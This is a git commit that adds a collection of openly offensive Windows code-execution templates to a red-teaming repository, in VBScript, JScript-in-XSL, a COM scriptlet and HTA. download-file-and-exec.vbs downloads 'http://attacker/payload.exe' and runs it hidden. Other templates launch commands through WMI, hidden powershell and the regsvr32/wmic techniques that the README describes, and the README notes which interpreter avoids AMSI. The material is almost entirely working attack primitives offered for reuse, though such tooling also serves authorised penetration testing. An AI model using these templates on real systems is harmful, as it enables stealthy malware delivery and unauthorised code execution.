Added code-exec-templates

2024-11-22 10:31:38 +01:00 · 2020-05-06 19:22:32 +02:00 · 2020-05-06 19:22:32 +02:00 · 8e976e7cee
commit 8e976e7cee
parent ce933bb1c5
10 changed files with 207 additions and 0 deletions
--- a/red-teaming/README.md
+++ b/red-teaming/README.md
@ -52,6 +52,8 @@ cmstp.exe /ni /s cmstp.inf
 - **`cobalt-arsenal`** - A set of my published Cobalt Strike 4.0+ compatible aggressor scripts. That includes couple of my handy utils I've used on various engagements.
 - [**`code-exec-templates`**](https://github.com/mgeeky/Penetration-Testing-Tools/tree/master/red-teaming/code-exec-templates) - a small collection of template/backbone files for various code-execution techniques (VBScript/JScript embedded in HTA/SCT/XSL/VBS/JS)
 - **`compressedPowershell.py`** - Creates a Powershell snippet containing GZIP-Compressed payload that will get decompressed and executed (IEX)
 . ([gist](https://gist.github.com/mgeeky/e30ceecc2082a11b99c7b24b42bd77fc))
--- a/red-teaming/code-exec-templates/README.md
+++ b/red-teaming/code-exec-templates/README.md
@ -0,0 +1,57 @@
 ### A small collection of unobfuscated code-execution primitives in different languages
 A handy collection of small primitives/templates useulf for code-execution, downloading or otherwise offensive purposes. Whenever a quick sample of VBScript/JScript/C# code is needed - this directory should bring you one.
 Windows Script Host (WSH) subsystem can execute VBScript/JScript scritplets using two pre-installed interpreters:
 - `cscript.exe` - to be used for command-line, dynamic script execution. **Doesn't load AMSI**
 - `wscript.exe` - For general scripts execution. **This one loads AMSI**
 #### VBScript
 - **`download-file-and-exec.vbs`** - Downloads a binary file using `Msxml2.ServerXMLHTTP`, stores it to the disk `Adodb.Stream` and then launches it via `Wscript.Shell Run`
 - **`wmi-exec-command.vbs`** - Example of VBScript code execution via WMI class' `Win32_Process` static method `Create`
 - **`wscript-shell-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window.
 - **`wscript-shell-stdin-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window through a command passed from StdIn to `powershell`
 #### JScript
 #### XSL
 XSL files can be executed in the following ways:
 - Using `wmic.exe`:
 ```
 wmic os get /format:"jscript-xslt-template.xsl"
 ```
 Templates:
 - **`hello-world-jscript-xslt.xsl`** - A sample backbone for XSLT file with JScript code showing a simple message box.
 - **`wscript-shell-run-jscript-xslt.xsl`** - JScript XSLT with `WScript.Shell.Run` method
 #### COM Scriptlets
 Sample code execution with `regsvr32` can be following:
 ```
 regsvr32 /u /n /s /i:wscript-shell-run-jscript-scriptlet.sct scrobj.dll
 ```
 - **`wscript-shell-run-jscript-scriptlet.sct`** - SCT file with JSCript code execution via `WScript.Shell.Run`
 #### HTA
 HTA files are HTML Applications
 - **`wscript-shell-run-vbscript.hta`** - A backbone for `WScript.Shell.Run` via _VBScript_ 
--- a/red-teaming/code-exec-templates/download-file-and-exec.vbs
+++ b/red-teaming/code-exec-templates/download-file-and-exec.vbs
@ -0,0 +1,38 @@
 '
 ' Example of downloading a binary file from the URL, saving it to the
 ' local filesystem and then launching.
 '
 ' Mariusz B. / mgeeky, <mb@binary-offensive.com>
 ' (https://github.com/mgeeky)
 '
 downloadURL = "http://attacker/payload.exe"
 saveAs = "%TEMP%\foo.exe"
 parameters = ""
 Dim sh: Set sh = CreateObject("WScript.Shell")
 out = sh.ExpandEnvironmentStrings(saveAs)
 ' STEP 1: Download File
 Dim xhr: Set xhr = CreateObject("Msxml2.ServerXMLHTTP")
 xhr.Open "GET", downloadURL, False
 xhr.Send
 ' STEP 2: Save binary file
 If xhr.Status = 200 Then
    With CreateObject("Adodb.Stream")
        .Open
        .Type = 1
        .write xhr.responseBody
        .savetofile out, 2
    End With
    ' STEP 3: Execute file
    cmd = out & " " & parameters
    MsgBox cmd
    sh.Run cmd, 0, False
 End If
 Set sh = Nothing
 Set xhr = Nothing
--- a/red-teaming/code-exec-templates/hello-world-jscript-xslt.xsl
+++ b/red-teaming/code-exec-templates/hello-world-jscript-xslt.xsl
@ -0,0 +1,15 @@
 <?xml version='1.0'?>
 <stylesheet
 xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
 xmlns:user="placeholder"
 version="1.0">
 <output method="text"/>
 <ms:script implements-prefix="user" language="JScript">
 <![CDATA[
 // Hello world
 var shell = new ActiveXObject("WScript.Shell");
 shell.Popup("Hello world from JScript XSL!");
 ]]> </ms:script>
 </stylesheet>
--- a/red-teaming/code-exec-templates/wmi-exec-command.vbs
+++ b/red-teaming/code-exec-templates/wmi-exec-command.vbs
@ -0,0 +1,20 @@
 '
 ' This script uses WMI class' Win32_Process static method Create to 
 ' execute given command in a hidden window (ShowWindow = 12).
 '
 ' Mariusz B. / mgeeky, <mb@binary-offensive.com>
 ' (https://github.com/mgeeky)
 '
 command = "notepad.exe"
 computer = "."
 Set wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" _
        & computer & "\root\cimv2")
 Set startup = wmi.Get("Win32_ProcessStartup")
 Set conf = startup.SpawnInstance_
 conf.ShowWindow = 12
 Set proc = GetObject("winmgmts:root\cimv2:Win32_Process")
 proc.Create command, Null, conf, intProcessID
--- a/red-teaming/code-exec-templates/wscript-shell-code-exec.vbs
+++ b/red-teaming/code-exec-templates/wscript-shell-code-exec.vbs
@ -0,0 +1,13 @@
 '
 ' This script uses classic WScript.Shell Run method to
 ' execute given command in a hidden window (second param = 0)
 '
 ' Mariusz B. / mgeeky, <mb@binary-offensive.com>
 ' (https://github.com/mgeeky)
 '
 command = "notepad.exe"
 With CreateObject("WScript.Shell")
 	.Run command, 0, False
 End With
--- a/red-teaming/code-exec-templates/wscript-shell-run-jscript-scriptlet.sct
+++ b/red-teaming/code-exec-templates/wscript-shell-run-jscript-scriptlet.sct
@ -0,0 +1,15 @@
 <?XML version="1.0"?>
 <scriptlet>
 <registration         
 progid="Foo"       
 classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
 <script language="JScript">
 <![CDATA[  
 var command = "notepad.exe";
 var r = new ActiveXObject("WScript.Shell").Run(command); 
 ]]>
 </script>
 </registration>
 </scriptlet>
--- a/red-teaming/code-exec-templates/wscript-shell-run-jscript-xslt.xsl
+++ b/red-teaming/code-exec-templates/wscript-shell-run-jscript-xslt.xsl
@ -0,0 +1,14 @@
 <?xml version='1.0'?>
 <stylesheet
 xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
 xmlns:user="placeholder"
 version="1.0">
 <output method="text"/>
 	<ms:script implements-prefix="user" language="JScript">
 	<![CDATA[
 	var command = "notepad";
 	var r = new ActiveXObject("WScript.Shell").Run(command);
 	]]> </ms:script>
 </stylesheet>
--- a/red-teaming/code-exec-templates/wscript-shell-run-vbscript.hta
+++ b/red-teaming/code-exec-templates/wscript-shell-run-vbscript.hta
@ -0,0 +1,14 @@
 <html>
 <head>
 <script language="VBScript"> 
    Sub foo
    	command = "notepad.exe"
        Set objShell = CreateObject("Wscript.Shell")
        objShell.Run command
    End Sub
 foo()
 </script>
 </head> 
 <body>
 </body>
 </html>
--- a/red-teaming/code-exec-templates/wscript-shell-stdin-code-exec.vbs
+++ b/red-teaming/code-exec-templates/wscript-shell-stdin-code-exec.vbs
@ -0,0 +1,19 @@
 '
 ' This script uses classic WScript.Shell Exec method to
 ' execute given command in a hidden window via StdIn passed to a dedicated
 ' launcher command (powershell.exe in this example).
 '
 ' Mariusz B. / mgeeky, <mb@binary-offensive.com>
 ' (https://github.com/mgeeky)
 '
 command = "notepad.exe"
 launcher = "powershell -nop -w hid -Command -"
 With CreateObject("WScript.Shell")
 	With .Exec(launcher)
        .StdIn.WriteLine command
        .StdIn.WriteBlankLines 1
        .Terminate
    End With
 End With